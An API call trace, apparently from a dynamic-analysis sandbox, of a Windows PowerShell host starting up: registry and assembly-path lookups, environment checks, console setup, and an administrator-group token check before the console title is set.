	[0314.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.490] CoTaskMemFree (pv=0x467e50) 
	[0314.495] lstrlenW (lpString="䅁") returned 1
	[0314.505] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad768 | out: phkResult=0x1ad768*=0x2ec) returned 0x0
	[0314.506] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad758 | out: phkResult=0x1ad758*=0x2f0) returned 0x0
	[0314.506] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad7e8 | out: phkResult=0x1ad7e8*=0x2f4) returned 0x0
	[0314.510] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad72c, lpData=0x0, lpcbData=0x1ad728*=0x0 | out: lpType=0x1ad72c*=0x1, lpData=0x0, lpcbData=0x1ad728*=0x56) returned 0x0
	[0314.511] CoTaskMemAlloc (cb=0x5a) returned 0x423310
	[0314.511] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad6fc, lpData=0x423310, lpcbData=0x1ad6f8*=0x56 | out: lpType=0x1ad6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad6f8*=0x56) returned 0x0
	[0314.511] CoTaskMemFree (pv=0x423310) 
	[0315.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0315.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0315.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0315.217] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0315.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.218] CoTaskMemFree (pv=0x467e50) 
	[0316.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0316.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0317.672] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0317.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.672] CoTaskMemFree (pv=0x467f60) 
	[0317.674] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0317.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.674] CoTaskMemFree (pv=0x467f60) 
	[0318.007] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0318.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.008] CoTaskMemFree (pv=0x467f60) 
	[0318.009] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0318.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.009] CoTaskMemFree (pv=0x467f60) 
	[0318.009] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0318.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.009] CoTaskMemFree (pv=0x467f60) 
	[0318.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0318.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0319.005] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0319.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.005] CoTaskMemFree (pv=0x467f60) 
	[0319.335] CoTaskMemAlloc (cb=0x104) returned 0x467f60
	[0319.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.335] CoTaskMemFree (pv=0x467f60) 
	[0319.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0323.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0325.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0325.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0326.759] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0326.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.760] CoTaskMemFree (pv=0x468180) 
	[0326.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0326.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0326.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0326.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0327.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0327.627] SetErrorMode (uMode=0x1) returned 0x1
	[0327.627] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ad6c0 | out: lpFileInformation=0x1ad6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0327.627] SetErrorMode (uMode=0x1) returned 0x1
	[0329.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0329.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0329.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0329.787] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0329.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.787] CoTaskMemFree (pv=0x468180) 
	[0330.304] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0330.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.304] CoTaskMemFree (pv=0x468180) 
	[0330.305] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0330.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.305] CoTaskMemFree (pv=0x468180) 
	[0330.307] CoCreateGuid (in: pguid=0x1ada88 | out: pguid=0x1ada88*(Data1=0x7e335203, Data2=0x587a, Data3=0x46a5, Data4=([0]=0xbb, [1]=0xd0, [2]=0x4d, [3]=0x25, [4]=0x9e, [5]=0x5e, [6]=0x96, [7]=0x70))) returned 0x0
	[0330.310] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0330.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.310] CoTaskMemFree (pv=0x468180) 
	[0330.313] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0330.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.313] CoTaskMemFree (pv=0x468180) 
	[0330.315] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0330.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.315] CoTaskMemFree (pv=0x468180) 
	[0330.322] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0330.323] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ad730 | out: lpConsoleScreenBufferInfo=0x1ad730) returned 1
	[0330.328] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0330.328] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ad730 | out: lpConsoleScreenBufferInfo=0x1ad730) returned 1
	[0330.329] GetVersionExW (in: lpVersionInformation=0x1ad6c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad6c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0330.332] GetCurrentProcess () returned 0xffffffffffffffff
	[0330.333] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ad758 | out: TokenHandle=0x1ad758*=0x308) returned 1
	[0330.338] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad678 | out: TokenInformation=0x0, ReturnLength=0x1ad678) returned 0
	[0330.339] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d72c0
	[0330.339] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x3d72c0, TokenInformationLength=0x4, ReturnLength=0x1ad678 | out: TokenInformation=0x3d72c0, ReturnLength=0x1ad678) returned 1
	[0330.341] DuplicateTokenEx (in: hExistingToken=0x308, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ad7d8 | out: phNewToken=0x1ad7d8*=0x304) returned 1
	[0330.341] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad678 | out: TokenInformation=0x0, ReturnLength=0x1ad678) returned 0
	[0330.341] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d7270
	[0330.341] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x3d7270, TokenInformationLength=0x4, ReturnLength=0x1ad678 | out: TokenInformation=0x3d7270, ReturnLength=0x1ad678) returned 1
	[0330.342] CheckTokenMembership (in: TokenHandle=0x304, SidToCheck=0x2d9acf0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ad7e8 | out: IsMember=0x1ad7e8) returned 1
	[0330.342] CloseHandle (hObject=0x304) returned 1
	[0330.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0330.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0330.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0330.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.629] CoTaskMemAlloc (cb=0x804) returned 0x1b820880
	[0331.629] GetConsoleTitleW (in: lpConsoleTitle=0x1b820880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0331.629] CoTaskMemFree (pv=0x1b820880) 
	[0331.652] CoTaskMemAlloc (cb=0x804) returned 0x1b821130
	[0331.652] GetConsoleTitleW (in: lpConsoleTitle=0x1b821130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0331.652] CoTaskMemFree (pv=0x1b821130) 
	[0331.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.654] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0331.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0331.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
